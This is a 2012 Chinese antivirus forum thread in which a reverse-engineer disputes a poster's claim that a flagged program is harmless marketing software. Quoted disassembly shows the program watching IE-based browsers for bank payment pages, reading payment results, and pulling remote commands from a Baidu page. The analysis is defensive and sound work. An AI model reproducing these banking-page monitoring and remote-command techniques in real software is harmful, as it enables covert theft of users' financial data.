360的确乱杀嘛

jefffire

nohelponline 发表于 2012-7-27 15:15
真的么 截个图看看

真的

只求1种安稳

进来看看

dl123100

哈的189

自己玩的东西，信任不就行了？

284678343

其实吧Q管也有反应的...

XMonster

284678343 发表于 2012-7-27 15:42
其实吧Q管也有反应的...

kcloud 拜金山所赐

师兄

既然楼主说是营销软件，那我们通过简单逆向来看一下此样本的具体行为：

样本找了几个主流的浏览器窗体：

Microsoft Internet Explorer (IE8 或早期版本)

1. .text:004072FE loc_4072FE:                             ; CODE XREF: sub_406E90+462j
   
2. .text:004072FE                 mov     [ebp+var_4], 0Ch
   
3. .text:00407305                 lea     eax, [ebp+var_E0]
   
4. .text:0040730B                 push    eax
   
5. .text:0040730C                 push    offset a32770   ; "#32770"
   
6. .text:00407311                 push    offset aMicrosoftInter ; "Microsoft Internet Explorer"
   
7. .text:00407316                 mov     ecx, [ebp+arg_0]
   
8. .text:00407319                 mov     edx, [ecx]
   
9. .text:0040731B                 mov     eax, [ebp+arg_0]
   
10. .text:0040731E                 push    eax
    
11. .text:0040731F                 call    dword ptr [edx+6F8h]

复制代码

Windows Internet Explorer (IE9)

1. .text:00407361                 mov     [ebp+var_4], 0Dh
   
2. .text:00407368                 lea     eax, [ebp+var_E0]
   
3. .text:0040736E                 push    eax
   
4. .text:0040736F                 push    offset a32770   ; "#32770"
   
5. .text:00407374                 push    offset aWindowsInterne ; "Windows Internet Explorer"
   
6. .text:00407379                 mov     ecx, [ebp+arg_0]
   
7. .text:0040737C                 mov     edx, [ecx]
   
8. .text:0040737E                 mov     eax, [ebp+arg_0]
   
9. .text:00407381                 push    eax
   
10. .text:00407382                 call    dword ptr [edx+6F8h]

复制代码

360 安全浏览器

1. .text:004073C4                 mov     [ebp+var_4], 0Eh
   
2. .text:004073CB                 lea     eax, [ebp+var_E0]
   
3. .text:004073D1                 push    eax
   
4. .text:004073D2                 push    offset a32770   ; "#32770"
   
5. .text:004073D7                 push    offset a360se   ; "360se"
   
6. .text:004073DC                 mov     ecx, [ebp+arg_0]
   
7. .text:004073DF                 mov     edx, [ecx]
   
8. .text:004073E1                 mov     eax, [ebp+arg_0]
   
9. .text:004073E4                 push    eax
   
10. .text:004073E5                 call    dword ptr [edx+6F8h]

复制代码

还有一些浏览器，在这就不一一列举了。

这些浏览器都有一个特点，就是基于IE内核的浏览器。
众所周知，IE浏览器可以通过特定接口，获取到页面的标题，源代码等一系列信息：
参照MSDN：http://msdn.microsoft.com/en-us/library/aa752574(v=vs.85).aspx

通过进一步分析，我们很容易在代码中找到楼主的用意：
获取到地址栏，判断是否是特定网址：

1. .text:00403BF5                 mov     [ebp+var_4], 4
   
2. .text:00403BFC                 mov     [ebp+var_94], offset aIbsbjstar_ccb_ ; "ibsbjstar.ccb.com.cn/app/ccbMain"
   
3. .text:00403C06                 mov     [ebp+var_9C], 8
   
4. .text:00403C10                 mov     [ebp+var_A4], 0
   
5. .text:00403C1A                 mov     [ebp+var_AC], 8002h
   
6. .text:00403C24                 push    1
   
7. .text:00403C26                 push    0
   
8. .text:00403C28                 push    offset aLocationurl ; "LocationURL"
   
9. .text:00403C2D                 mov     ecx, [ebp+var_28]
   
10. .text:00403C30                 push    ecx
    
11. .text:00403C31                 lea     edx, [ebp+var_4C]
    
12. .text:00403C34                 push    edx
    
13. .text:00403C35                 call    ds:__vbaLateMemCallLd

复制代码

网址主要包括：
ibsbjstar.ccb.com.cn/app/ccbMain（建设银行）
easyabc.95599.cn/b2c（农业银行）
b2c.icbc.com.cn（工商银行）
mybank.icbc.com.cn（工商银行）

我们注意到，判断的网址都是一些银行的支付页面网址，如果按照楼主的说明，这是一个“营销软件”的话，请解释一下为何要判断用户的浏览器是否正在打开网银页面？你所谓的“营销”需要拿到用户这些信息么？如果你说你仅仅是获取，并没有“偷钱”的行为，那么我还要告诉你，这属于用户的隐私，盗取隐私也是属于病毒行为。何况你盗取隐私时，并没有相关说明，也没有提示，那么对于用户来说，这些行为全是不透明的。

试想，一个未知程序，经过隐藏的方式，没有任何提示，获取到用户的银行信息，这样的程序难道是正常的么？

好吧，接着往下看：

1. .text:004058FE                 mov     [ebp+var_4], 6
   
2. .text:00405905                 mov     [ebp+var_174], 6
   
3. .text:0040590F                 mov     [ebp+var_17C], 2
   
4. .text:00405919                 mov     [ebp+var_154], offset aTd ; "td"
   
5. .text:00405923                 mov     [ebp+var_15C], 8
   
6. .text:0040592D                 mov     [ebp+var_134], 2
   
7. .text:00405937                 mov     [ebp+var_13C], 2
   
8. .text:00405941                 mov     [ebp+var_194], offset aBFontColorBc00 ; "<B><FONT color=#bc0021>RMB 2.00 </FONT>"...
   
9. .text:0040594B                 mov     [ebp+var_19C], 8008h
   
10. .text:00405955                 push    0
    
11. .text:00405957                 push    offset aInnerhtml ; "innerHTML"
    
12. .text:0040595C                 mov     eax, 10h
    
13. .text:00405961                 call    __vbaChkstk

复制代码

果然调取了银行的支付结果页面，RMB 2.00，就算对计算机病毒一点都不懂的人，一眼就看出了，这是2元人民币的意思。至于这个样本后续要做什么，因为楼主没有写的很明确，我们不得而知。

再看一处：

1. .text:004096DE                 mov     [ebp+var_80], offset aHttpHi_baidu_c ; "http://hi.baidu.com/2322w434/item/f0b6a"...
   
2. .text:004096E5                 mov     [ebp+var_88], ebx
   
3. .text:004096EB                 call    esi ; __vbaVarDup
   
4. .text:004096ED                 lea     eax, [ebp+var_48]
   
5. .text:004096F0                 lea     ecx, [ebp+var_38]
   
6. .text:004096F3                 push    eax
   
7. .text:004096F4                 lea     edx, [ebp+var_58]

复制代码

1. .text:00409731                 lea     edx, [ebp+var_A8]
   
2. .text:00409737                 lea     ecx, [ebp+var_48]
   
3. .text:0040973A                 mov     [ebp+var_50], eax
   
4. .text:0040973D                 mov     [ebp+var_58], eax
   
5. .text:00409740                 mov     [ebp+var_A0], offset asc_403778 ; "$$"
   
6. .text:0040974A                 mov     [ebp+var_A8], ebx
   
7. .text:00409750                 call    esi ; __vbaVarDup
   
8. .text:00409752                 lea     edx, [ebp+var_98]
   
9. .text:00409758                 lea     ecx, [ebp+var_38]
   
10. .text:0040975B                 mov     [ebp+var_90], offset asc_403768 ; "####"
    
11. .text:00409765                 mov     [ebp+var_98], ebx
    
12. .text:0040976B                 call    esi ; __vbaVarDup
    
13. .text:0040976D                 lea     ecx, [ebp+var_28]
    
14. .text:00409770                 lea     edx, [ebp+var_58]
    
15. .text:00409773                 mov     [ebp+var_80], ecx
    
16. .text:00409776                 lea     eax, [ebp+var_48]
    
17. .text:00409779                 push    edx
    
18. .text:0040977A                 lea     ecx, [ebp+var_38]
    
19. .text:0040977D                 push    eax
    
20. .text:0040977E                 lea     edx, [ebp+var_88]

复制代码

楼主打开 http://hi.baidu.com/2322w434/item/f0b6a736373f6ce92f8ec244  这个页面，获取了页面上的信息，并通过解析 $$$$ 和 #### 等符号来获取远程指令。

只不过页面目前没有内容，只是有 0000 这几个字在其中，后续楼主改成什么，怎么去执行，我们更不得而知。

如果楼主仍然认为这是一个“营销程序”的话，那么欢迎你来反驳。也希望某些病毒作者收下心来，不要使用这种误导的方法，用舆论压力迫使加白。

黑羽

占个位置看楼上分析，最近闹剧特别多

对了，特别欢迎楼主发些网银样本充实样本包

Arisu

师兄 发表于 2012-7-27 16:05
既然楼主说是营销软件，那我们通过简单逆向来看一下此样本的具体行为：

样本找了几个主流的浏览器窗体： ...

分析的不错，坐等楼主反驳

liangfangCN

师兄 发表于 2012-7-27 16:05
既然楼主说是营销软件，那我们通过简单逆向来看一下此样本的具体行为：

样本找了几个主流的浏览器窗体： ...

那个连接是控制软件正常与否的！
软件的功能再说一次！---------------！
使用了以后 刷信誉的
拍一个2元的商品
懂没？